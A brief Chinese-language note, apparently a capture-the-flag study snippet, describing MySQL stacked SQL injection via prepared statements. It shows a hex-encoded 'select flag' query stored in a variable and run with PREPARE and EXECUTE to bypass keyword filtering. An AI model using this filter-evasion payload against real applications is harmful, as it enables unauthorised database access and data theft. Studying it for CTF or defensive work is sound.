需要支持堆叠注入才能实现预处理语句注入
set @变量名='sql语句';
set此时接收的就是字符串模式的sql语句,所以不用担心执行时因为他是字符串格式
就报错

//将注入语句写入变量内部
-- set @a=0x73656c65637420666c61672066726f6d206031393139383130393331313435313460;
//将语句设置为十六进制来绕过检查进行堆叠注入

prepare 参数名 from @变量名;
//可自由更改预处理SQL语句赋值给自定义标识
execute 参数名;
//输出预处理语句执行注入